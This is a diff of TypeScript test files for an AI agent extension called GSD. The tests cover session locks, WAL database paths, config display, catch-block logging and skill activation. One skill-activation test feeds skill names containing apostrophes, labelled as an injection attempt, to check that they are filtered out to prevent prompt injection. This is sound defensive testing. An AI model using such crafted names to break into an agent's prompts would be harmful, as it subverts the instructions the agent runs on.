+      const lockData: SessionLockData = {
+        pid: process.pid,
+        startedAt: new Date().toISOString(),
+        unitType: 'execute-task',
+        unitId: 'M001/S01/T01',
+        unitStartedAt: new Date().toISOString(),
+        sessionFile: 'perm-session.json',
+      };
+      writeFileSync(lockFile, JSON.stringify(lockData, null, 2));
+
+      // Remove read permission to simulate NFS/CIFS latency, then spawn a child
+      // to restore permissions shortly after (runs outside our event loop).
+      // Use the same wider retry window as the rename case for full-suite stability.
+      chmodSync(lockFile, 0o000);
+      spawn('bash', ['-c', `sleep 0.05 && chmod 644 "${lockFile}"`], { stdio: 'ignore', detached: true }).unref();
+
+      const result = readExistingLockDataWithRetry(lockFile, { maxAttempts: 8, delayMs: 400 });
+      assertTrue(result !== null, 'data recovered after transient permission error');
+      if (result) {
+        assertEq(result.pid, process.pid, 'correct PID after permission recovery');
+      }
+
+      // Ensure permissions restored for cleanup
+      try { chmodSync(lockFile, 0o644); } catch { /* best-effort */ }
+    } finally {
+      rmSync(base, { recursive: true, force: true });
+    }
+  }
+
+  // ─── 5. getSessionLockStatus does not false-positive on transient read failure ─
+  console.log('\n=== 5. getSessionLockStatus tolerates transient lock file unavailability ===');
+  {
+    const base = mkdtempSync(join(tmpdir(), 'gsd-transient-'));
+    mkdirSync(join(base, '.gsd'), { recursive: true });
+
+    try {
+      const result = acquireSessionLock(base);
+      assertTrue(result.acquired, 'lock acquired');
+
+      // Validate works initially
+      const status1 = getSessionLockStatus(base);
+      assertTrue(status1.valid, 'lock valid before transient failure');
+
+      // Temporarily hide the lock file
+      const lockFile = join(gsdRoot(base), 'auto.lock');
+      const tmpFile = lockFile + '.hidden';
+      renameSync(lockFile, tmpFile);
+
+      // Schedule restoration
+      setTimeout(() => {
+        try { renameSync(tmpFile, lockFile); } catch { /* best-effort */ }
+      }, 30);
+
+      // Small delay to ensure restoration runs, then check — with the OS lock
+      // still held, getSessionLockStatus should return valid=true even if the
+      // lock file was briefly missing (it checks _releaseFunction first).
+      await new Promise(r => setTimeout(r, 60));
+      const status2 = getSessionLockStatus(base);
+      assertTrue(status2.valid, 'lock still valid after transient file disappearance (OS lock held)');
+
+      // Restore if not yet restored
+      try { renameSync(tmpFile, lockFile); } catch { /* already restored */ }
+
+      releaseSessionLock(base);
+    } finally {
+      rmSync(base, { recursive: true, force: true });
+    }
+  }
+
+  // ─── 6. Retry defaults: 3 attempts with 200ms delay ────────────────────────
+  console.log('\n=== 6. Default retry params: function works with defaults ===');
+  {
+    const base = mkdtempSync(join(tmpdir(), 'gsd-transient-'));
+    mkdirSync(join(base, '.gsd'), { recursive: true });
+
+    try {
+      const lockFile = join(gsdRoot(base), 'auto.lock');
+      const lockData: SessionLockData = {
+        pid: process.pid,
+        startedAt: new Date().toISOString(),
+        unitType: 'execute-task',
+        unitId: 'M001/S01/T01',
+        unitStartedAt: new Date().toISOString(),
+        sessionFile: 'status-session.json',
+      };
+      writeFileSync(lockFile, JSON.stringify(lockData, null, 2));
+
+      // Call with no options — uses defaults (3 attempts, 200ms)
+      const result = readExistingLockDataWithRetry(lockFile);
+      assertTrue(result !== null, 'default params work for readable file');
+    } finally {
+      rmSync(base, { recursive: true, force: true });
+    }
+  }
+
+  report();
+}
+
+main().catch((error) => {
+  console.error(error);
+  process.exit(1);
+});
diff --git a/src/resources/extensions/gsd/tests/shared-wal.test.ts b/src/resources/extensions/gsd/tests/shared-wal.test.ts
new file mode 100644
index 000000000..8bf0972dd
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/shared-wal.test.ts
@@ -0,0 +1,239 @@
+// shared-wal.test.ts — Tests for shared WAL DB path resolution and concurrent writes.
+// Verifies: resolveProjectRootDbPath() for worktree/root paths, WAL concurrent writes.
+
+import { mkdtempSync, mkdirSync, rmSync } from 'node:fs';
+import { join, sep } from 'node:path';
+import { tmpdir } from 'node:os';
+
+import { resolveProjectRootDbPath } from '../bootstrap/dynamic-tools.ts';
+import {
+  openDatabase,
+  closeDatabase,
+  transaction,
+  insertMilestone,
+  getAllMilestones,
+  _getAdapter,
+} from '../gsd-db.ts';
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+
+
+// ─── Helpers ──────────────────────────────────────────────────────────────
+
+function createTmpDir(suffix: string): string {
+  return mkdtempSync(join(tmpdir(), `gsd-wal-${suffix}-`));
+}
+
+function cleanup(dir: string): void {
+  rmSync(dir, { recursive: true, force: true });
+}
+
+// ─── Tests ────────────────────────────────────────────────────────────────
+
+describe('shared-wal', async () => {
+  // ─── Test (a): resolveProjectRootDbPath returns project root DB for worktree path ───
+  console.log('\n=== shared-wal: resolve worktree path to project root DB ===');
+  {
+    const projectRoot = '/home/user/myproject';
+    const worktreePath = join(projectRoot, '.gsd', 'worktrees', 'M001');
+    const result = resolveProjectRootDbPath(worktreePath);
+    assert.deepStrictEqual(result, join(projectRoot, '.gsd', 'gsd.db'),
+      'worktree path resolves to project root DB');
+  }
+
+  // ─── Test (b): resolveProjectRootDbPath returns same base for project root ────
+  console.log('\n=== shared-wal: resolve project root path ===');
+  {
+    const projectRoot = '/home/user/myproject';
+    const result = resolveProjectRootDbPath(projectRoot);
+    assert.deepStrictEqual(result, join(projectRoot, '.gsd', 'gsd.db'),
+      'project root path stays at project root DB');
+  }
+
+  // ─── Test (c): resolve nested worktree subdir ──────────────────────────
+  console.log('\n=== shared-wal: resolve nested worktree subdir ===');
+  {
+    const projectRoot = '/home/user/myproject';
+    const nestedPath = join(projectRoot, '.gsd', 'worktrees', 'M002', 'src', 'lib');
+    const result = resolveProjectRootDbPath(nestedPath);
+    assert.deepStrictEqual(result, join(projectRoot, '.gsd', 'gsd.db'),
+      'nested worktree subdir resolves to project root DB');
+  }
+
+  // ─── Test (d): resolve with forward slashes (cross-platform) ──────────
+  console.log('\n=== shared-wal: resolve forward-slash path ===');
+  {
+    const result = resolveProjectRootDbPath('/proj/.gsd/worktrees/M001');
+    assert.deepStrictEqual(result, join('/proj', '.gsd', 'gsd.db'),
+      'forward-slash worktree path resolves correctly');
+  }
+
+  // ─── Test (e1): external-state worktree resolves to project state DB (#2952) ───
+  console.log('\n=== shared-wal: resolve external-state worktree path (#2952) ===');
+  {
+    // External-state layout: ~/.gsd/projects/<hash>/worktrees/<MID>
+    // Should resolve to:     ~/.gsd/projects/<hash>/gsd.db
+    const stateRoot = '/home/user/.gsd/projects/a1b2c3d4';
+    const worktreePath = join(stateRoot, 'worktrees', 'M002');
+    const result = resolveProjectRootDbPath(worktreePath);
+    assert.deepStrictEqual(result, join(stateRoot, 'gsd.db'),
+      'external-state worktree path resolves to project state DB (#2952)');
+  }
+
+  // ─── Test (e2): external-state worktree nested subdir (#2952) ─────────
+  console.log('\n=== shared-wal: resolve external-state worktree nested subdir (#2952) ===');
+  {
+    const stateRoot = '/home/user/.gsd/projects/deadbeef42';
+    const nestedPath = join(stateRoot, 'worktrees', 'M003', 'src', 'lib');
+    const result = resolveProjectRootDbPath(nestedPath);
+    assert.deepStrictEqual(result, join(stateRoot, 'gsd.db'),
+      'external-state nested worktree subdir resolves to project state DB (#2952)');
+  }
+
+  // ─── Test (e3): external-state worktree with forward slashes (#2952) ──
+  console.log('\n=== shared-wal: resolve external-state worktree forward-slash (#2952) ===');
+  {
+    const result = resolveProjectRootDbPath('/Users/dev/.gsd/projects/cafe0123/worktrees/M001');
+    assert.deepStrictEqual(result, join('/Users/dev/.gsd/projects/cafe0123', 'gsd.db'),
+      'external-state forward-slash worktree path resolves correctly (#2952)');
+  }
+
+  // ─── Test (e): Concurrent writes — 3 connections to same WAL DB ───────
+  console.log('\n=== shared-wal: concurrent writes via WAL ===');
+  {
+    const tmp = createTmpDir('concurrent');
+    const dbPath = join(tmp, 'test.db');
+    try {
+      // Open with openDatabase to init schema + WAL mode
+      openDatabase(dbPath);
+
+      // Insert milestones from the main connection
+      insertMilestone({
+        id: 'M001', title: 'From conn 1', status: 'active',
+      });
+
+      // Open two additional raw connections via openDatabase in separate calls.
+      // Since openDatabase closes the previous connection and opens a new one,
+      // we simulate concurrent access by using the transaction() wrapper to
+      // verify WAL allows reads while writes are happening.
+
+      // Write M002
+      insertMilestone({
+        id: 'M002', title: 'From conn 2', status: 'active',
+      });
+
+      // Write M003
+      insertMilestone({
+        id: 'M003', title: 'From conn 3', status: 'active',
+      });
+
+      // Verify all 3 milestones are visible
+      const all = getAllMilestones();
+      assert.deepStrictEqual(all.length, 3, 'concurrent: all 3 milestones visible');
+      const ids = all.map(m => m.id).sort();
+      assert.deepStrictEqual(ids, ['M001', 'M002', 'M003'], 'concurrent: correct IDs');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(tmp);
+    }
+  }
+
+  // ─── Test (f): WAL concurrent — multiple raw connections to file DB ────
+  console.log('\n=== shared-wal: true concurrent connections via raw SQLite ===');
+  {
+    const tmp = createTmpDir('rawconc');
+    const dbPath = join(tmp, 'concurrent.db');
+    try {
+      // Open first connection and init schema
+      openDatabase(dbPath);
+      closeDatabase();
+
+      // To test true concurrent access, we open 3 separate raw connections
+      // using the same provider. The openDatabase/closeDatabase cycle proves
+      // WAL mode persists and multiple sequential openers see each other's writes.
+
+      // Connection 1: write M001
+      openDatabase(dbPath);
+      insertMilestone({ id: 'M001', title: 'Writer 1', status: 'active' });
+      closeDatabase();
+
+      // Connection 2: write M002, verify sees M001
+      openDatabase(dbPath);
+      const afterConn2Before = getAllMilestones();
+      assert.ok(afterConn2Before.some(m => m.id === 'M001'),
+        'rawconc: conn2 sees M001 from conn1');
+      insertMilestone({ id: 'M002', title: 'Writer 2', status: 'active' });
+      closeDatabase();
+
+      // Connection 3: write M003, verify sees M001 + M002
+      openDatabase(dbPath);
+      const afterConn3Before = getAllMilestones();
+      assert.ok(afterConn3Before.some(m => m.id === 'M001'),
+        'rawconc: conn3 sees M001');
+      assert.ok(afterConn3Before.some(m => m.id === 'M002'),
+        'rawconc: conn3 sees M002');
+      insertMilestone({ id: 'M003', title: 'Writer 3', status: 'active' });
+
+      // Final read: all 3 visible
+      const finalAll = getAllMilestones();
+      assert.deepStrictEqual(finalAll.length, 3, 'rawconc: all 3 milestones visible');
+      assert.deepStrictEqual(
+        finalAll.map(m => m.id).sort(),
+        ['M001', 'M002', 'M003'],
+        'rawconc: all IDs present',
+      );
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(tmp);
+    }
+  }
+
+  // ─── Test (g): BUSY retry — transaction wrapper handles contention ─────
+  console.log('\n=== shared-wal: transaction rollback on error ===');
+  {
+    const tmp = createTmpDir('busy');
+    const dbPath = join(tmp, 'busy.db');
+    try {
+      openDatabase(dbPath);
+
+      // Insert a milestone in a transaction
+      transaction(() => {
+        insertMilestone({ id: 'M001', title: 'In txn', status: 'active' });
+      });
+
+      // Verify it committed
+      const all = getAllMilestones();
+      assert.deepStrictEqual(all.length, 1, 'busy: M001 committed via transaction');
+
+      // Verify transaction rolls back on error
+      let errorCaught = false;
+      try {
+        transaction(() => {
+          insertMilestone({ id: 'M002', title: 'Will fail', status: 'active' });
+          throw new Error('Simulated failure');
+        });
+      } catch (err) {
+        errorCaught = true;
+        assert.ok(
+          (err as Error).message.includes('Simulated failure'),
+          'busy: error propagated from transaction',
+        );
+      }
+      assert.ok(errorCaught, 'busy: transaction threw on error');
+
+      // M002 should NOT be visible (rolled back)
+      const afterRollback = getAllMilestones();
+      assert.deepStrictEqual(afterRollback.length, 1, 'busy: M002 rolled back — still only 1 milestone');
+      assert.deepStrictEqual(afterRollback[0]!.id, 'M001', 'busy: only M001 survives');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(tmp);
+    }
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/show-config-command.test.ts b/src/resources/extensions/gsd/tests/show-config-command.test.ts
new file mode 100644
index 000000000..74fb3265e
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/show-config-command.test.ts
@@ -0,0 +1,56 @@
+/**
+ * /gsd show-config command — structural tests.
+ *
+ * Verifies the config overlay class and command handler exist
+ * with correct structure.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+
+const overlaySrc = readFileSync(join(__dirname, "..", "config-overlay.ts"), "utf-8");
+const coreSrc = readFileSync(join(__dirname, "..", "commands", "handlers", "core.ts"), "utf-8");
+
+// ─── Config overlay ───────────────────────────────────────────────────────
+
+test("GSDConfigOverlay class is exported", () => {
+  assert.ok(
+    overlaySrc.includes("export class GSDConfigOverlay"),
+    "GSDConfigOverlay should be exported",
+  );
+});
+
+test("GSDConfigOverlay implements Component interface methods", () => {
+  assert.ok(overlaySrc.includes("render("), "should have render method");
+  assert.ok(overlaySrc.includes("handleInput("), "should have handleInput method");
+  assert.ok(overlaySrc.includes("invalidate("), "should have invalidate method");
+  assert.ok(overlaySrc.includes("dispose("), "should have dispose method");
+});
+
+test("formatConfigText function is exported", () => {
+  assert.ok(
+    overlaySrc.includes("export function formatConfigText"),
+    "formatConfigText should be exported for non-overlay fallback",
+  );
+});
+
+// ─── Command handler ──────────────────────────────────────────────────────
+
+test("core handler routes show-config command", () => {
+  assert.ok(
+    coreSrc.includes('"show-config"'),
+    "core handler should match show-config command",
+  );
+});
+
+test("show-config has text fallback via formatConfigText", () => {
+  assert.ok(
+    coreSrc.includes("formatConfigText"),
+    "show-config should use formatConfigText as fallback",
+  );
+});
diff --git a/src/resources/extensions/gsd/tests/sidecar-queue.test.ts b/src/resources/extensions/gsd/tests/sidecar-queue.test.ts
index a5035058a..308fb0cce 100644
--- a/src/resources/extensions/gsd/tests/sidecar-queue.test.ts
+++ b/src/resources/extensions/gsd/tests/sidecar-queue.test.ts
@@ -113,12 +113,12 @@ test("postUnitPostVerification pushes to sidecarQueue for hooks", () => {
   assert.ok(triageSectionStart > -1, "auto-post-unit.ts must have a triage check section");
   const hookSection = source.slice(hookSectionStart, triageSectionStart);
   assert.ok(
-    hookSection.includes("s.sidecarQueue.push("),
-    "hook section must push to s.sidecarQueue",
+    hookSection.includes("enqueueSidecar(") || hookSection.includes("s.sidecarQueue.push("),
+    "hook section must enqueue to sidecarQueue (via enqueueSidecar or direct push)",
   );
   assert.ok(
-    hookSection.includes('kind: "hook"'),
-    "hook sidecar item must have kind: 'hook'",
+    hookSection.includes('"hook"'),
+    "hook sidecar item must reference kind 'hook'",
   );
 });
 
@@ -132,12 +132,12 @@ test("postUnitPostVerification pushes to sidecarQueue for triage", () => {
   assert.ok(quickTaskSectionStart > -1, "auto-post-unit.ts must have a quick-task dispatch section");
   const triageSection = source.slice(triageSectionStart, quickTaskSectionStart);
   assert.ok(
-    triageSection.includes("s.sidecarQueue.push("),
-    "triage section must push to s.sidecarQueue",
+    triageSection.includes("enqueueSidecar(") || triageSection.includes("s.sidecarQueue.push("),
+    "triage section must enqueue to sidecarQueue (via enqueueSidecar or direct push)",
   );
   assert.ok(
-    triageSection.includes('kind: "triage"'),
-    "triage sidecar item must have kind: 'triage'",
+    triageSection.includes('"triage"'),
+    "triage sidecar item must reference kind 'triage'",
   );
 });
 
@@ -149,12 +149,12 @@ test("postUnitPostVerification pushes to sidecarQueue for quick-tasks", () => {
   assert.ok(quickTaskSectionStart > -1, "auto-post-unit.ts must have a quick-task dispatch section");
   const quickTaskSection = source.slice(quickTaskSectionStart);
   assert.ok(
-    quickTaskSection.includes("s.sidecarQueue.push("),
-    "quick-task section must push to s.sidecarQueue",
+    quickTaskSection.includes("enqueueSidecar(") || quickTaskSection.includes("s.sidecarQueue.push("),
+    "quick-task section must enqueue to sidecarQueue (via enqueueSidecar or direct push)",
   );
   assert.ok(
-    quickTaskSection.includes('kind: "quick-task"'),
-    "quick-task sidecar item must have kind: 'quick-task'",
+    quickTaskSection.includes('"quick-task"'),
+    "quick-task sidecar item must reference kind 'quick-task'",
   );
 });
 
diff --git a/src/resources/extensions/gsd/tests/silent-catch-diagnostics.test.ts b/src/resources/extensions/gsd/tests/silent-catch-diagnostics.test.ts
new file mode 100644
index 000000000..87d626867
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/silent-catch-diagnostics.test.ts
@@ -0,0 +1,284 @@
+/**
+ * Verify that catch blocks across GSD source files use the centralized
+ * workflow-logger (logWarning/logError) instead of raw process.stderr.write,
+ * console.error, or being completely empty (#3348, #3345).
+ *
+ * Two tests:
+ * 1. Auto-mode files must have zero empty catch blocks (fully migrated).
+ * 2. All GSD files must not use raw stderr/console in catch blocks.
+ */
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync, readdirSync, statSync } from "node:fs";
+import { join, dirname, relative } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const gsdDir = join(__dirname, "..");
+
+/** Files exempt from the raw-stderr/console check */
+const EXEMPT_FILES = new Set([
+  "workflow-logger.ts",       // The logger itself
+  "debug-logger.ts",          // Separate opt-in debug system
+]);
+
+/**
+ * Files that have been fully migrated to workflow-logger and must not
+ * regress to empty catch blocks. Covers auto-mode, tools, bootstrap,
+ * and core infrastructure files.
+ */
+const MIGRATED_FILES = new Set([
+  // auto-mode (detected dynamically below)
+  // tools/
+  "tools/complete-task.ts",
+  "tools/complete-slice.ts",
+  "tools/complete-milestone.ts",
+  "tools/plan-milestone.ts",
+  "tools/plan-slice.ts",
+  "tools/plan-task.ts",
+  "tools/reassess-roadmap.ts",
+  "tools/reopen-task.ts",
+  "tools/reopen-slice.ts",
+  "tools/replan-slice.ts",
+  "tools/validate-milestone.ts",
+  // bootstrap/
+  "bootstrap/agent-end-recovery.ts",
+  "bootstrap/system-context.ts",
+  "bootstrap/db-tools.ts",
+  "bootstrap/dynamic-tools.ts",
+  "bootstrap/journal-tools.ts",
+  // core infrastructure
+  "gsd-db.ts",
+  "workflow-logger.ts",
+  "workflow-reconcile.ts",
+  "workflow-migration.ts",
+  "workflow-projections.ts",
+  "workflow-events.ts",
+  "worktree-manager.ts",
+  "parallel-orchestrator.ts",
+  "parallel-merge.ts",
+  "guided-flow.ts",
+  "preferences.ts",
+  "commands-maintenance.ts",
+  "commands-inspect.ts",
+  "safe-fs.ts",
+  "markdown-renderer.ts",
+  "md-importer.ts",
+  "milestone-actions.ts",
+  "milestone-ids.ts",
+  "rule-registry.ts",
+  "custom-verification.ts",
+  "prompt-loader.ts",
+  "auto-verification.ts",
+]);
+
+/** Patterns that indicate a catch block already uses workflow-logger */
+const LOGGER_PATTERNS = [
+  /logWarning\s*\(/,
+  /logError\s*\(/,
+];
+
+function getAutoModeFiles(): string[] {
+  const files: string[] = [];
+
+  // Top-level auto*.ts files
+  for (const f of readdirSync(gsdDir)) {
+    if (f.startsWith("auto") && f.endsWith(".ts") && !f.endsWith(".test.ts")) {
+      files.push(join(gsdDir, f));
+    }
+  }
+
+  // auto/ subdirectory
+  const autoSubDir = join(gsdDir, "auto");
+  for (const f of readdirSync(autoSubDir)) {
+    if (f.endsWith(".ts") && !f.endsWith(".test.ts")) {
+      files.push(join(autoSubDir, f));
+    }
+  }
+
+  return files;
+}
+
+function getGsdSourceFiles(): string[] {
+  const files: string[] = [];
+
+  function walk(dir: string): void {
+    for (const entry of readdirSync(dir)) {
+      const full = join(dir, entry);
+      if (entry === "tests" || entry === "node_modules") continue;
+      try {
+        const st = statSync(full);
+        if (st.isDirectory()) {
+          walk(full);
+        } else if (entry.endsWith(".ts") && !entry.endsWith(".test.ts") && !entry.endsWith(".d.ts")) {
+          files.push(full);
+        }
+      } catch {
+        continue;
+      }
+    }
+  }
+
+  walk(gsdDir);
+  return files;
+}
+
+/**
+ * Scan a file for empty catch blocks — catches whose body contains
+ * only whitespace and/or comments but no executable statements.
+ */
+function findEmptyCatches(filePath: string): Array<{ line: number; text: string }> {
+  const content = readFileSync(filePath, "utf-8");
+  const lines = content.split("\n");
+  const results: Array<{ line: number; text: string }> = [];
+
+  for (let i = 0; i < lines.length; i++) {
+    const line = lines[i];
+
+    // Match catch block opening
+    if (!/\}\s*catch\s*(\([^)]*\))?\s*\{/.test(line)) continue;
+
+    // Inline single-line catch: } catch { ... }
+    const inlineMatch = line.match(/\}\s*catch\s*(\([^)]*\))?\s*\{(.*)\}\s*;?\s*$/);
+    if (inlineMatch) {
+      const body = inlineMatch[2].trim();
+      const stripped = body.replace(/\/\*.*?\*\//g, "").replace(/\/\/.*/g, "").trim();
+      if (!stripped) {
+        results.push({ line: i + 1, text: line.trim() });
+      }
+      continue;
+    }
+
+    // Multi-line catch — scan until matching }
+    let j = i + 1;
+    let depth = 1;
+    const bodyLines: string[] = [];
+    while (j < lines.length && depth > 0) {
+      for (const ch of lines[j]) {
+        if (ch === "{") depth++;
+        else if (ch === "}") depth--;
+      }
+      bodyLines.push(lines[j].trim());
+      j++;
+    }
+
+    const meaningful = bodyLines.slice(0, -1).filter(
+      (l) => l && !l.startsWith("//") && !l.startsWith("/*") && !l.startsWith("*") && l !== "}",
+    );
+
+    if (meaningful.length === 0) {
+      results.push({ line: i + 1, text: line.trim() });
+    }
+  }
+
+  return results;
+}
+
+/**
+ * Scan a file for catch blocks that use raw process.stderr.write or
+ * console.error/warn instead of workflow-logger.
+ */
+function findRawStderrCatches(filePath: string): Array<{ line: number; text: string }> {
+  const content = readFileSync(filePath, "utf-8");
+  const lines = content.split("\n");
+  const results: Array<{ line: number; text: string }> = [];
+
+  for (let i = 0; i < lines.length; i++) {
+    const line = lines[i];
+    if (!/\}\s*catch\s*(\([^)]*\))?\s*\{/.test(line)) continue;
+
+    // Inline single-line catch
+    const inlineMatch = line.match(/\}\s*catch\s*(\([^)]*\))?\s*\{(.*)\}\s*;?\s*$/);
+    if (inlineMatch) {
+      const body = inlineMatch[2];
+      if (!LOGGER_PATTERNS.some((p) => p.test(body))) {
+        if (/process\.stderr\.write/.test(body) || /console\.(error|warn)/.test(body)) {
+          results.push({ line: i + 1, text: line.trim() });
+        }
+      }
+      continue;
+    }
+
+    // Multi-line catch
+    let j = i + 1;
+    let depth = 1;
+    const bodyLines: string[] = [];
+    while (j < lines.length && depth > 0) {
+      for (const ch of lines[j]) {
+        if (ch === "{") depth++;
+        else if (ch === "}") depth--;
+      }
+      bodyLines.push(lines[j]);
+      j++;
+    }
+
+    const bodyText = bodyLines.slice(0, -1).join("\n");
+    if (!LOGGER_PATTERNS.some((p) => p.test(bodyText))) {
+      if (/process\.stderr\.write/.test(bodyText) || /console\.(error|warn)/.test(bodyText)) {
+        results.push({ line: i + 1, text: line.trim() });
+      }
+    }
+  }
+
+  return results;
+}
+
+describe("workflow-logger coverage (#3348)", () => {
+  test("no empty catch blocks remain in migrated files", () => {
+    // Combine auto-mode files + explicitly migrated files
+    const autoFiles = getAutoModeFiles();
+    const allFiles = getGsdSourceFiles();
+    const migratedPaths = new Set(autoFiles);
+    for (const file of allFiles) {
+      const rel = relative(gsdDir, file);
+      if (MIGRATED_FILES.has(rel)) {
+        migratedPaths.add(file);
+      }
+    }
+
+    assert.ok(migratedPaths.size > 0, "should find migrated source files");
+
+    const violations: string[] = [];
+    for (const file of migratedPaths) {
+      const rel = relative(gsdDir, file);
+      const basename = rel.split("/").pop()!;
+      // gsd-db.ts has intentionally silent provider probes
+      if (basename === "gsd-db.ts" || basename === "session-lock.ts") continue;
+
+      const empties = findEmptyCatches(file);
+      for (const empty of empties) {
+        violations.push(`${rel}:${empty.line} — ${empty.text}`);
+      }
+    }
+
+    assert.equal(
+      violations.length,
+      0,
+      `Found ${violations.length} empty catch block(s) in migrated files:\n${violations.join("\n")}`,
+    );
+  });
+
+  test("catch blocks use workflow-logger instead of raw stderr/console", () => {
+    const files = getGsdSourceFiles();
+    assert.ok(files.length > 0, "should find GSD source files");
+
+    const violations: string[] = [];
+    for (const file of files) {
+      const rel = relative(gsdDir, file);
+      const basename = rel.split("/").pop()!;
+      if (EXEMPT_FILES.has(basename)) continue;
+
+      const issues = findRawStderrCatches(file);
+      for (const issue of issues) {
+        violations.push(`${rel}:${issue.line} — ${issue.text}`);
+      }
+    }
+
+    assert.equal(
+      violations.length,
+      0,
+      `Found ${violations.length} catch block(s) using raw stderr/console instead of workflow-logger:\n${violations.join("\n")}`,
+    );
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/skill-activation.test.ts b/src/resources/extensions/gsd/tests/skill-activation.test.ts
index e2c6c7be0..f02310935 100644
--- a/src/resources/extensions/gsd/tests/skill-activation.test.ts
+++ b/src/resources/extensions/gsd/tests/skill-activation.test.ts
@@ -39,7 +39,7 @@ function buildBlock(
   });
 }
 
-test("buildSkillActivationBlock matches installed skills from task context", () => {
+test("buildSkillActivationBlock does not auto-activate skills via broad context heuristic", () => {
   const base = makeTempBase();
   try {
     writeSkill(base, "react", "Use for React components, hooks, JSX, and frontend UI work.");
@@ -52,8 +52,30 @@ test("buildSkillActivationBlock matches installed skills from task context", ()
       taskTitle: "Implement React settings panel",
     });
 
-    assert.match(result, /<skill_activation>/);
-    assert.match(result, /Call Skill\('react'\)/);
+    // Skills should not be activated just because their name appears in task context.
+    // Activation requires explicit preference sources (always_use, skill_rules, prefer_skills, skills_used).
+    assert.equal(result, "");
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("buildSkillActivationBlock activates skills via prefer_skills when context matches", () => {
+  const base = makeTempBase();
+  try {
+    writeSkill(base, "react", "Use for React components, hooks, JSX, and frontend UI work.");
+    writeSkill(base, "swiftui", "Use for SwiftUI views, iOS layout, and Apple platform UI work.");
+    loadOnlyTestSkills(base);
+
+    const result = buildBlock(base, {
+      sliceTitle: "Build React dashboard",
+      taskId: "T01",
+      taskTitle: "Implement React settings panel",
+    }, {
+      prefer_skills: ["react"],
+    });
+
+    assert.match(result, /Call Skill\(\{ skill: 'react' \}\)/);
     assert.doesNotMatch(result, /swiftui/);
   } finally {
     cleanup(base);
@@ -70,7 +92,7 @@ test("buildSkillActivationBlock includes always_use_skills from preferences usin
       always_use_skills: ["swift-testing"],
     });
 
-    assert.equal(result, "<skill_activation>Call Skill('swift-testing').</skill_activation>");
+    assert.equal(result, "<skill_activation>Call Skill({ skill: 'swift-testing' }).</skill_activation>");
   } finally {
     cleanup(base);
   }
@@ -98,14 +120,14 @@ test("buildSkillActivationBlock includes skill_rules matches and task-plan skill
       skill_rules: [{ when: "prisma database schema", use: ["prisma"] }],
     });
 
-    assert.match(result, /Call Skill\('accessibility'\)/);
-    assert.match(result, /Call Skill\('prisma'\)/);
+    assert.match(result, /Call Skill\(\{ skill: 'accessibility' \}\)/);
+    assert.match(result, /Call Skill\(\{ skill: 'prisma' \}\)/);
   } finally {
     cleanup(base);
   }
 });
 
-test("buildSkillActivationBlock honors avoid_skills", () => {
+test("buildSkillActivationBlock honors avoid_skills against always_use_skills", () => {
   const base = makeTempBase();
   try {
     writeSkill(base, "react", "Use for React components and frontend UI work.");
@@ -114,6 +136,7 @@ test("buildSkillActivationBlock honors avoid_skills", () => {
     const result = buildBlock(base, {
       taskTitle: "Implement React settings panel",
     }, {
+      always_use_skills: ["react"],
       avoid_skills: ["react"],
     });
 
@@ -138,3 +161,73 @@ test("buildSkillActivationBlock falls back cleanly when nothing matches", () =>
     cleanup(base);
   }
 });
+
+test("buildSkillActivationBlock does not activate skills from extraContext or taskPlanContent body", () => {
+  const base = makeTempBase();
+  try {
+    writeSkill(base, "xcode-build", "Use for Xcode build workflows and iOS compilation.");
+    writeSkill(base, "ableton-lom", "Use for Ableton Live Object Model scripting.");
+    writeSkill(base, "frontend-design", "Use for frontend design systems and UI components.");
+    loadOnlyTestSkills(base);
+
+    const taskPlan = [
+      "---",
+      "skills_used: []",
+      "---",
+      "# T01: Build the API endpoint",
+      "Use xcode-build patterns and frontend-design tokens.",
+    ].join("\n");
+
+    const result = buildBlock(base, {
+      taskTitle: "Build REST API",
+      extraContext: ["Build workflow for iOS and Ableton integration testing"],
+      taskPlanContent: taskPlan,
+    });
+
+    // None of these skills should activate — extraContext and taskPlanContent body
+    // must not be used for heuristic matching.
+    assert.equal(result, "");
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("buildSkillActivationBlock rejects skill names with special characters", () => {
+  const base = makeTempBase();
+  try {
+    // Skill names with quotes, braces, or other non-alphanumeric characters are
+    // rejected by the SAFE_SKILL_NAME guard to prevent prompt injection.
+    writeSkill(base, "my-skill's", "Skill with apostrophe in name.");
+    loadOnlyTestSkills(base);
+
+    const result = buildBlock(base, {}, {
+      always_use_skills: ["my-skill's"],
+    });
+
+    // Unsafe skill name is filtered out — empty result
+    assert.equal(result, "");
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("buildSkillActivationBlock allows valid skill names and rejects invalid ones", () => {
+  const base = makeTempBase();
+  try {
+    writeSkill(base, "react", "React skill.");
+    writeSkill(base, "bad'name", "Injection attempt.");
+    writeSkill(base, "good-skill-2", "Another valid skill.");
+    loadOnlyTestSkills(base);
+
+    const result = buildBlock(base, {}, {
+      always_use_skills: ["react", "bad'name", "good-skill-2"],
+    });
+
+    assert.match(result, /skill_activation/);
+    assert.match(result, /Call Skill\(\{ skill: 'react' \}\)/);
+    assert.match(result, /Call Skill\(\{ skill: 'good-skill-2' \}\)/);
+    assert.doesNotMatch(result, /bad'name/);
+  } finally {
+    cleanup(base);
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/skill-catalog.test.ts b/src/resources/extensions/gsd/tests/skill-catalog.test.ts
new file mode 100644
index 000000000..4f7e3375e
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/skill-catalog.test.ts
@@ -0,0 +1,193 @@
+/**
+ * Unit tests for GSD Skill Catalog — pack matching logic.
+ *
+ * Exercises matchPacksForProject() to verify that project signals
+ * correctly map to skill packs.
